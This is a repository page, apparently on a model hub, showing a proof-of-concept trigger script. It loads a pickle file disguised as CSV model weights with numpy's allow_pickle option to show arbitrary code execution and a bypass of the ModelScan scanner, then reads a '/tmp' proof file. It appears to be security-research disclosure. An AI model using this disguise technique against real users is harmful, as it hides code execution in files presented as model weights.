csv-numpy-ace-poc / trigger.py
hoanghai2110's picture
Add ACE+ModelScan bypass PoC: numpy pickle disguised as CSV
feee83e verified
Raw
History Blame Contribute Delete
466 Bytes
import numpy as np
print("[*] Loading poc_model_weights.csv with np.load(allow_pickle=True)...")
print("[*] numpy ignores extension, reads magic bytes -> loads as NPY -> unpickles")
data = np.load("poc_model_weights.csv", allow_pickle=True)
print("[+] Load complete. Check /tmp/csv_model_pwned.txt for proof.")
import os
result = open("/tmp/csv_model_pwned.txt").read() if os.path.exists("/tmp/csv_model_pwned.txt") else "not found"
print(f"[+] Proof:\n{result}")